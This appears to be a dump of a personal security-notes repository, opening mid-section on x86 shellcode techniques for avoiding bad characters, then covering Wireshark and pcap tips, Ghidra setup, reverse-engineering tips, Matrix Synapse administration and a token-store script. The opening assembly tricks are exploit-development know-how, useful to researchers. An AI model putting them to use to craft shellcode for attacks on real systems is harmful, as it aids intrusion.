We can use the previous trick of adding 32 (0x20) to our shift value to avoid bad chars

    ;-------------; OPCODE ; EAX Value --------------------------; Description ------
    xor eax, eax  ; 31c0   ; 00000000 00000000 00000000 00000000 ; Clear EAX
    inc eax       ; 40     ; 00000000 00000000 00000000 00000001 ; Increment
    shl eax, 0x42 ; c1e042 ; 00000000 00000000 00000000 00000100 ; Shifting by 2 bits
    inc eax       ; 40     ; 00000000 00000000 00000000 00000101 ; Increment
    shl eax, 0x26 ; c1e026 ; 00000000 00000000 00000001 01000000 ; Shifting by 6 bits
    inc eax       ; 40     ; 00000000 00000000 00000001 01000001 ; Increment
    shl eax, 0x41 ; c1e041 ; 00000000 00000000 00000010 10000010 ; Shifting by 1 bit
    inc eax       ; 40     ; 00000000 00000000 00000010 10000011 ; Increment
    shl eax, 0x62 ; c1e062 ; 00000000 00000000 00001010 00001100 ; Shifting by 2 bits
    inc eax       ; 40     ; 00000000 00000000 00001010 00001101 ; Increment

### Add and Sub

Let's say you want 0x0A0D in EAX, but these are both bad chars. Use the constant 0x1111 to armor it, then subtract the same value to restore.

    mov ax, 0x1B1E
    sub ax, 0x1111

### Logical Operations

You can avoid bad chars by using bitmasks and logical instructions too

In all of the examples, we want to put 0x0A0D in EAX

XOR (A good online XOR calculator http://xor.pw/)

    mov ax, 0x3037
    xor ax, 0x3a3a

NOT

    mov ax, 0xf5f2
    not ax

OR

    00001000 00001000 [0x0808]
    00000010 00000101 [0x0205]
    -------------------------- ORing keeps 1 if either or both bits is set to 1
    00001010 00001101 [0x0A0D]

    mov ax, 0x0808
    or ax, 0x0205

AND

    01011010 01001111 [0x5A4F]
    00101011 00111101 [0x2B3D]
    -------------------------- ANDing only keeps 1 if both bits are set to 1
    00001010 00001101 [0x0A0D]

    mov ax, 0x5A4F
    and ax, 0x2B3D

## Optimizing for Size

### Clearing Registers

[cdq](https://www.felixcloutier.com/x86/cwd:cdq:cqo) - Sign extends EAX to EDX:EAX, so `xor eax, eax` and then `cdq` will make EDX and EAX both 0 in only 3 bytes.

[mul](https://www.felixcloutier.com/x86/mul) - With only one operand specified, mul assumes that the destination is EAX, so it stores the result in EDX:EAX.

    xor ecx, ecx ; 0
    mul ecx      ; Effectively edx_eax = ecx * eax, now all equal 0

### Filling Multiple registers

* [pusha](https://www.felixcloutier.com/x86/pusha:pushad)
* [popa](https://www.felixcloutier.com/x86/popa:popad)

--------------------------------------------------------------------------------
/protocols/list_protos.sh:
--------------------------------------------------------------------------------
#!/bin/bash
# List all the protocols detected in every pcap in a directory
# Usage: ./list_protos.sh <directory>
c1="\033[38;5;228m"
c2="\033[38;5;122m"
# Quote the arguments so paths containing spaces are handled
for file in "$1"/*
do
    if [ "$file" != "$0" ] ; then
        echo -e "$c1$file$c2"
        tshark -r "$file" -T fields -e frame.protocols | sort -u
        echo -e "\033[0m"
    fi
done

--------------------------------------------------------------------------------
/protocols/pcap_format.md:
--------------------------------------------------------------------------------
References
- [https://wiki.wireshark.org/Development/LibpcapFileFormat](https://wiki.wireshark.org/Development/LibpcapFileFormat) PCAP Format
- [https://gitlab.com/wireshark/wireshark/-/wikis/Development/LibpcapFileFormat](https://gitlab.com/wireshark/wireshark/-/wikis/Development/LibpcapFileFormat) Newer docs on PCAP format
- [https://pcapng.github.io/pcapng/draft-tuexen-opsawg-pcapng.html](https://pcapng.github.io/pcapng/draft-tuexen-opsawg-pcapng.html) PCAPNG Format

Basic layout of a PCAP file

![image](https://user-images.githubusercontent.com/26436276/199809307-d618cf6d-1abe-4417-947b-d7f17af81a76.png)

A pcapng file.
Basically everything is a "block" and there's all this extra metadata

![image](https://user-images.githubusercontent.com/26436276/199809420-9dfd8fbe-590b-4d1e-aa1e-30d48a642b0c.png)
--------------------------------------------------------------------------------
/protocols/wiresharktips.md:
--------------------------------------------------------------------------------
# Wireshark Tips

[https://gitlab.com/wireshark/wireshark/-/wikis/home](https://gitlab.com/wireshark/wireshark/-/wikis/home) The Wireshark wiki

Additional oneliners here: https://github.com/netspooky/notes/blob/main/linux/oneliners.md#tshark-and-wireshark

## Install wireshark from source
This is how you do it on Linux at least
```
git clone https://gitlab.com/wireshark/wireshark.git
cd wireshark
sudo ./tools/debian-setup.sh
mkdir build
cd build
cmake ..
make
```
Now you can run with:
```
run/wireshark
```

## Dissector stuff

[https://mika-s.github.io/wireshark/lua/dissector/2017/11/04/creating-a-wireshark-dissector-in-lua-1.html](https://mika-s.github.io/wireshark/lua/dissector/2017/11/04/creating-a-wireshark-dissector-in-lua-1.html)

[https://www.wireshark.org/docs/wsdg_html_chunked/wslua_tap_example.html](https://www.wireshark.org/docs/wsdg_html_chunked/wslua_tap_example.html)

This is really useful for reference

[11.6. Functions For New Protocols And Dissectors](https://www.wireshark.org/docs/wsdg_html_chunked/lua_module_Proto.html)

### Calling another dissector

[https://www.wireshark.org/docs/wsdg_html_chunked/lua_module_Proto.html](https://www.wireshark.org/docs/wsdg_html_chunked/lua_module_Proto.html)

The `buf(offset):tvb()` arg is important.
`offset` is where in the previous buffer to start, and `:tvb()` converts the resulting range (a TvbRange userdata) into a tvb that the next dissector can take.

```lua
function proto_lap5.dissector(buf, pinfo, tree)
    if buf:len() > HEADER_LEN then
        -- create a new buffer containing only the XLES data,
        -- and pass it to the XLES dissector
        Dissector.get("xles"):call(buf(HEADER_LEN):tvb(), pinfo, tree)
    end
end
```

### Dealing with UTF16 strings

This is actually a really sick way to do this... it goes by the null terminated string...

```lua
msg_f = ProtoField.string("mydissector.msg", "msg")
local getMsg = buffer(13) -- starting on byte 13
local msg = getMsg:le_ustring()
subtree:add(msg_f, getMsg, msg)
```

# Capturing Bluetooth with Wireshark
Tested on Ubuntu 22.04
- Enable Bluetooth in settings
- Use the bluetooth-monitor interface
- Use this filter to get advertising reports `bthci_evt.le_meta_subevent == 0x02`
- Filter for one device `btcommon.eir_ad.entry.device_name == "My Device"`
- Filter on MAC addrs `bthci_evt.bd_addr == 55:55:55:55:55:55`
- See messages with manufacturer data `btcommon.eir_ad.entry.data`
--------------------------------------------------------------------------------
/re/ghidra_setup.md:
--------------------------------------------------------------------------------
# Linux Ghidra Setup
Updated 2023-02-01

This worked on Ubuntu 22.04 with Ghidra 10.2.2.
It requires Java 17+

```
sudo apt update
sudo apt install openjdk-17-jdk
sudo apt install openjdk-17-jre
java -version # Confirm it's installed
# Download latest from https://github.com/NationalSecurityAgency/ghidra/releases
wget https://github.com/NationalSecurityAgency/ghidra/releases/download/Ghidra_10.2.2_build/ghidra_10.2.2_PUBLIC_20221115.zip
7z x ghidra_10.2.2_PUBLIC_20221115.zip
cd ghidra_10.2.2_PUBLIC_20221115/
./ghidraRun
```
--------------------------------------------------------------------------------
/re/string_representation.md:
--------------------------------------------------------------------------------
# RE Tips: Common String Representations

_Originally posted 2022-05-09_

Strings are a good way of determining the layout of an unknown binary blob. If you can figure out how the strings are stored, you can use them as an anchor to map out other structures around them.

![image](https://user-images.githubusercontent.com/26436276/209995327-7e24d760-de7a-41c0-8ab3-28fdc5dfcb7c.png)

Image Description:

A text file explaining the common string representations.

- Length First, where the length of the string is stored before the string.
- Null Terminated, where each string ends in a null byte.
- Fixed Width, where each field is a fixed size. These can also have padding if they need to be aligned to a certain number of bytes, AKA their size must be divisible by a certain number.
--------------------------------------------------------------------------------
/re/timestamps.md:
--------------------------------------------------------------------------------
# RE Tips: Timestamps

_Originally Posted: 2021-09-10_

If you're analyzing an unknown protocol or binary format, know your time stamps!

Let's say you know the pcap (or file) was created in the last 24 hours.

Right now it's 1631293496 in Unix time.
- In hex: 613B9038
- In ASCII: "a;\x908"

https://unixtimestamp.com

If we go back exactly 24 hrs, the time is 1631221496.
- In hex: 613A76F8
- In ASCII: "a:v\xF8"

Now you can look in the hex dump for "a" and either ":" or ";" beside it. If you don't know the endianness, this can be a good way to figure that out. You can also align fields around it.

Not all protocols or file formats will have timestamps included, but it's common enough that it's a good thing to search for, especially if there are few strings.

There are lots of other timestamp formats that are helpful to know. Familiarize yourself for gr8 victory.

Example: Given this, if you found a timestamp, you can probably assume that there's _some_ kind of boundary at 0xC1. It's lil endian, and now you can trace other values.

- Is 0xA5 a virtual address?
- Is 0xB9 a boolean?
- Is 0xCB a bit pattern?

These are the questions you wanna ask.

![highlighted hex dump that is described by the writeup](https://user-images.githubusercontent.com/26436276/209995891-483dc310-bce2-41fa-b7dc-893b4a31149e.png)
--------------------------------------------------------------------------------
/sysadmin/matrix_synapse.md:
--------------------------------------------------------------------------------
These are tips and tricks for [Matrix Synapse](https://github.com/matrix-org/synapse/). This assumes that all of this is being done on your server directly.

## Add a new user
```
register_new_matrix_user -c /etc/matrix-synapse/homeserver.yaml http://localhost:8008
```
## Change a user's password.

You have to create a password hash using `hash_password` and your homeserver file so that it does the type of hashing you want.
```
hash_password -c /etc/matrix-synapse/homeserver.yaml
```
Then switch to the postgres user and update the user with the new hash you just made.
```
sudo su
su postgres
psql
\c synapse
UPDATE users SET password_hash='NEWHASH' WHERE name='@user:your.host';
\q
```
## Clear media cache
Use the [admin API](https://matrix-org.github.io/synapse/latest/admin_api/media_admin_api.html) for this. You can call this API from localhost on your machine.

You will also need an admin user and the auth token for this user. You can grab this from the client supposedly, but I just use the matrix_tokenstore.py script in this folder to log in and create a new session just for this.

First, grab a timestamp that you want to clear from. Synapse expects a unix timestamp with millisecond precision.
```
date --date='1 year ago' +%s%3N
```
Let's say that this timestamp is `1635382166398`. You will put this at the end of your request, after the `before_ts=` part of the URL. The URL is quoted so the shell doesn't try to glob the `?`.
```
curl --header "Authorization: Bearer YOURTOKEN" -X POST "http://localhost:8008/_synapse/admin/v1/purge_media_cache?before_ts=1635382166398"
```
Run that and you should be good. If there is an error, the JSON from the server will indicate it.

## Fixing libolm error in python

I have some bots and services which use libolm via the [matrix-nio](https://github.com/poljar/matrix-nio) library.
Sometimes during an update this shared object is overwritten, so fix it like so:

```
sudo ln -sf /usr/local/lib/libolm.so /usr/lib/x86_64-linux-gnu/libolm.so.2
```
--------------------------------------------------------------------------------
/sysadmin/matrix_tokenstore.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python3
import asyncio
import json
import os
import sys
import getpass
# https://github.com/poljar/matrix-nio This is where nio is from
from nio import AsyncClient, LoginResponse

CONFIG_FILE = "credentials.json"

# Check out main() below to see how it's done.

def write_details_to_disk(resp: LoginResponse, homeserver) -> None:
    """Writes the required login details to disk so we can log in later without
    using a password.
    Arguments:
        resp {LoginResponse} -- the successful client login response.
        homeserver -- URL of homeserver, e.g. "https://matrix.example.org"
    """
    # The file holds a live access token, so create it owner-readable only (0600)
    fd = os.open(CONFIG_FILE, os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o600)
    with os.fdopen(fd, "w") as f:
        # write the login details to disk
        json.dump(
            {
                "homeserver": homeserver,  # e.g. "https://matrix.example.org"
                "user_id": resp.user_id,  # e.g. "@user:example.org"
                "device_id": resp.device_id,  # device ID, 10 uppercase letters
                "access_token": resp.access_token  # cryptogr. access token
            },
            f
        )

async def main() -> None:
    # If there are no previously-saved credentials, we'll use the password
    if not os.path.exists(CONFIG_FILE):
        print("First time use. Did not find credential file. Asking for "
              "homeserver, user, and password to create credential file.")
        # Pressing enter at a prompt keeps the default shown in brackets
        homeserver = "https://matrix.example.org"
        homeserver = input(f"Enter your homeserver URL: [{homeserver}] ") or homeserver

        if not (homeserver.startswith("https://")
                or homeserver.startswith("http://")):
            homeserver = "https://" + homeserver

        user_id = "@user:example.org"
        user_id = input(f"Enter your full user ID: [{user_id}] ") or user_id

        device_name = "matrix-nio"
        device_name = input(f"Choose a name for this device: [{device_name}] ") or device_name

        client = AsyncClient(homeserver, user_id)
        pw = getpass.getpass()

        resp = await client.login(pw, device_name=device_name)

        # check that we logged in successfully
        if isinstance(resp, LoginResponse):
            write_details_to_disk(resp, homeserver)
        else:
            print(f"homeserver = \"{homeserver}\"; user = \"{user_id}\"")
            print(f"Failed to log in: {resp}")
            sys.exit(1)

        print(
            "Logged in using a password. Credentials were stored.",
            "Try running the script again to login with credentials."
        )

    # Otherwise the config file exists, so we'll use the stored credentials
    else:
        # open the file in read-only mode
        with open(CONFIG_FILE, "r") as f:
            config = json.load(f)
            client = AsyncClient(config['homeserver'])

            client.access_token = config['access_token']
            client.user_id = config['user_id']
            client.device_id = config['device_id']

        # Now we can send messages as the user
        room_id = "!myfavouriteroomid:example.org"
        room_id = input(f"Enter room id for test message: [{room_id}] ")

        await client.room_send(
            room_id,
            message_type="m.room.message",
            content={
                "msgtype": "m.text",
                "body": "I'M GETTING BENT LIKE A PARABOLA"
            }
        )
        print("Logged in using stored credentials. Sent a test message.")

    # Either way we're logged in here, too
    await client.close()

if __name__ == "__main__":
    asyncio.run(main())
--------------------------------------------------------------------------------
/themes/darkmode.md:
--------------------------------------------------------------------------------
Here are various ways of doing darkmode on different things.

Dark Mode in Windows 10, use regedit to change this key. Works without needing to activate Windows.
```
HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Themes\\Personalize\\AppsUseLightTheme = 0
```

Bootleg Qt dark mode on Wireshark >= 3.4.4 on Windows.
```
"C:\\Program Files\\Wireshark\\Wireshark.exe" -platform windows:darkmode=2
```

Ghidra Dark mode! [https://github.com/zackelia/ghidra-dark](https://github.com/zackelia/ghidra-dark)
- TIP: Just download flatlaf JAR file from line 40 in install.py and put it in the Ghidra install folder (wherever ghidraRun is).
- I installed like `python3 install.py -p "C:\Users\user\Documents\Tools\ghidra_10.0.4_PUBLIC_20210928\ghidra_10.0.4_PUBLIC"`
--------------------------------------------------------------------------------
/themes/prompts.md:
--------------------------------------------------------------------------------
1. This is my minimal PS1 for Bash
```
PS1="\\[\\e]0;\\u@\\h: \\w\\a\\]\\[\\e[38;5;123m\\]\\t\\[\\e[0m\\] \\[\\e[38;5;219m\\]\\w \\[\\e[0m\\]\\n▶ "
```

2. This is the more full PS1 with time and the directory.
```
PS1="\\[\\e[38;5;141m\\][\\[\\e[m\\]\\[\\e[38;5;219m\\]\\u\\[\\e[m\\]\\[\\e[38;5;226m\\]@\\[\\e[m\\]\\[\\e[38;5;86m\\]\\h\\[\\e[m\\]\\[\\e[38;5;141m\\]]-[\\[\\e[m\\]\\[\\e[38;5;159m\\]\\t\\[\\e[m\\]\\[\\e[38;5;141m\\]]-[\\[\\e[m\\]\\[\\e[38;5;226m\\]\\w\\[\\e[m\\]\\[\\e[38;5;141m\\]]\\[\\e[m\\]\\n\\\\$ \\[$(tput sgr0)\\]"
```

3. A ZSH prompt that looks similar to 2
```
PROMPT="%{$reset_color%}%{$fg[cyan]%}%D{%Y-%m-%d %I:%M:%S}%b%{$reset_color%} %{$fg[magenta]%}%~%{$reset_color%}
%{$fg[yellow]%}~%{$reset_color%}"
```
--------------------------------------------------------------------------------
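Added example for the timestamp search described in /re/timestamps.md above (not part of the original repo): it scans a blob for 32-bit Unix times between the two values that note quotes, in both byte orders, and derives the "a:" / "a;" byte pairs to look for. The sample format (`NSPK` magic, length-first records) and all function names are constructed for illustration.

```python
import struct
from collections import Counter

# Search window: the two Unix times quoted in the timestamps note.
WINDOW_START = 1631221496  # 0x613A76F8
WINDOW_END = 1631293496    # 0x613B9038


def ascii_prefixes(start, end):
    """Every possible leading byte pair (big-endian order) of a time in the window."""
    return [struct.pack(">H", hi) for hi in range(start >> 16, (end >> 16) + 1)]


def find_timestamps(blob, start, end):
    """Slide over every offset and test the 4-byte word in both byte orders."""
    hits = []
    for off in range(len(blob) - 3):
        word = blob[off:off + 4]
        for order, fmt in (("little", "<I"), ("big", ">I")):
            value = struct.unpack(fmt, word)[0]
            if start <= value <= end:
                hits.append((off, order, value))
    return hits


def guess_byte_order(hits):
    """Majority vote over the hits; None when there are no hits or a tie."""
    counts = Counter(order for _, order, _ in hits).most_common()
    if not counts or (len(counts) > 1 and counts[0][1] == counts[1][1]):
        return None
    return counts[0][0]


def make_sample():
    """Constructed sample: 4-byte magic, then records of <u32 time><u8 len><bytes>."""
    def record(ts, text):
        return struct.pack("<IB", ts, len(text)) + text
    return b"NSPK" + record(1631250000, b"hello") + record(1631290000, b"world!")


if __name__ == "__main__":
    sample = make_sample()
    print("byte pairs to grep for:", ascii_prefixes(WINDOW_START, WINDOW_END))
    hits = find_timestamps(sample, WINDOW_START, WINDOW_END)
    for off, order, value in hits:
        print(f"offset 0x{off:02x}  {order:<6}  {value}")
    print("byte order:", guess_byte_order(hits))
```

In a little-endian file the byte pair appears reversed and at the end of the 4-byte field, which is why the scan checks both orders instead of searching for the ASCII pair alone.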